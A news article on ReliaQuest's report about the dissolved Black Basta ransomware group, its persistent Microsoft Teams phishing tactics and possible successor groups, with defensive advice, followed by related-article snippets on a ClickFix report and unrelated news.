ReliaQuest details Black Basta's legacy & rise of Teams phishing

ReliaQuest has released an in-depth report on the state of Black Basta, a former ransomware-as-a-service (RaaS) group, following the leak of the group's internal chat logs and its subsequent dissolution in February 2025.
The demise of Black Basta, a Russian-speaking criminal group previously active in naming up to 50 victims each month on its data-leak site, was triggered by a member known as ExploitWhispers. This individual leaked private chat logs on Telegram out of frustration with the group's decision to target Russian financial organisations, revealing the internal dynamics and operational methods of one of the most prolific RaaS groups to date.
Ongoing impact
Despite the cessation of activity under the Black Basta name, ReliaQuest's analysis shows that many of the group's phishing and intrusion tactics continue to be used. Former affiliates are operating with a consistent set of methods, relying heavily on large-scale email spam and Microsoft Teams phishing, and adapting to include techniques such as Python script execution to deliver payloads.
"Despite the group's dissolution, former members continue to use its tried-and-tested tactics, with mass email spam followed by Teams phishing remaining a persistent and effective attack method. 'New' ransomware groups like '3AM' are taking pages from Black Basta's playbook, particularly its signature phishing tact," ReliaQuest notes in its assessment.
The organisation reported that Teams phishing attacks have maintained a steady pace since February 2025, with a marked increase in April when these incidents accounted for more than 35% of Black Basta-style activity targeting ReliaQuest's own customers. Half of these observed attacks originated from onmicrosoft[.]com domains, exploiting the ease of account creation and rotation on Microsoft's platform. The report suggests this trend is expected to continue.
The use of onmicrosoft[.]com domains remains the primary method for launching phishing campaigns via Teams, but the report highlights that efforts to compromise microsoft[.]com accounts, which give campaigns more credibility, are also growing. While such attacks are harder to carry out, their sophistication and risk could increase in the coming months.
Evolving methodology "Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads."
ReliaQuest documented a May 2025 case involving a manufacturing sector client, where attackers used a Teams phishing campaign from an onmicrosoft[.]com-based account to gain remote access via Quick Assist and AnyDesk. Python scripts were then deployed to download and execute a markdown file, enabling command and control (C2) communications. The attack was detected and contained before it could escalate.
Shifts among ransomware groups
The closure of Black Basta's data-leak site, paired with the continuation of its trademark tactics, suggests that its former members may have joined other RaaS collectives or formed new ones. Leaked chat logs indicate a substantial payment—between USD $500,000 and USD $600,000—by Black Basta's leader to the Cactus RaaS group, suggesting a relationship between the two. There was also a notable increase in named victim organisations on Cactus's data-leak site that coincided with Black Basta's closure.
Another scenario under consideration is that affiliates have transitioned to "Blacklock", a RaaS group previously known as Eldorado, which has named more than 50 organisations on its site. Eldorado's Russian-speaking origins and rebranding have led to speculation about links to Black Basta's membership.
Internal organisation and adaptation
ReliaQuest's analysis of the leaked chat logs provides insight into Black Basta's operational structure, which included defined roles such as intrusion specialists, campaign managers, and ransomware developers. The group also collaborated with external malware developers and used purchased access to tools like QakBot and DarkGate for campaigns, maintaining communication chains for technical support and updates.
ReliaQuest highlights the group's flexibility in tactics, warning that an overemphasis on defending against a single vector—such as brute-force attacks—could leave organisations exposed to more sophisticated phishing methods. The report urges a comprehensive, multi-layered defense posture.
Mitigating the threat
ReliaQuest emphasises the importance of user education to counter the social engineering techniques favoured by ransomware affiliates. "To counter these threats, organisations should prioritise user education on phishing tactics. Informed and vigilant employees are often the first and most effective line of defence, stopping social engineering attacks before they succeed."
Recent case studies in sectors including finance, insurance, and construction indicated that previous staff training helped potential victims avoid compromise during coordinated phishing campaigns. Security teams received real-time alerts and took prompt action, benefiting from employee awareness programmes.
Additional recommendations for defence include restricting the use of personal Google accounts on company devices, implementing detection rules for unusual Python activity, monitoring for unauthorised remote-access tools, and deploying automated response playbooks for threat containment.
ReliaQuest's threat research team continues to monitor shifting TTPs (tactics, techniques, and procedures) among ransomware groups, rapidly integrating new indicators of compromise into its security platform and supporting customers with intelligence-driven threat hunting and response measures.
The report concludes that the tactics established by Black Basta are likely to remain prominent among ransomware operators, underscoring the need for ongoing vigilance, robust technical controls, and investment in cyber awareness among staff.

Try Our AI Features

Explore what Daily8 AI can do for you:

Learn with AIFact CheckingText to SpeechAI Summary

Related Articles

NZ Herald

a day ago

• NZ Herald

Russian tech billionaire Pavel Durov claims to have fathered 100 children

As birthrates around the world tumble, one Russian technology tycoon is doing his best to reverse the trend. Pavel Durov, the entrepreneur behind controversial messaging app Telegram, claims he has fathered more than 100 children and has promised to split his fortune between them equally when he dies. Durov, the

Techday NZ

2 days ago

• Techday NZ

ReliaQuest report exposes rise of social engineering cyber threats

ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base. ClickFix and social engineering tactics One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics." Lateral movement and initial access trends Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems." Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors. MSHTA on the rise for defence evasion MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details. Changes in ransomware operations The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders." Impact on industry sectors The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign. Malware trends and threat actor activity The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments. Emergence of Scattered Spider Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack." Recommendations and defensive measures ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.

NZ Herald

14-06-2025

• NZ Herald

Russian energy giant Rosatom to build Kazakhstan's first nuclear plant near Balkhash Lake

An aerial view shows the village of Ulken (foreground) and the proposed nuclear power plant site near in the village of Ulken, located on the shores of Lake Balkhash, about 400 kilometres north of Almaty, on September 22, 2024, the place where the first country's nuclear power plant is planned to be built. Photo / AFP Russian nuclear energy giant Rosatom will lead the construction of the first atomic power plant in Kazakhstan, the world's top uranium producer, the Central Asian country's authorities said on Saturday. 'Rosatom has been named as the leader of the international consortium for the construction of the first nuclear power plant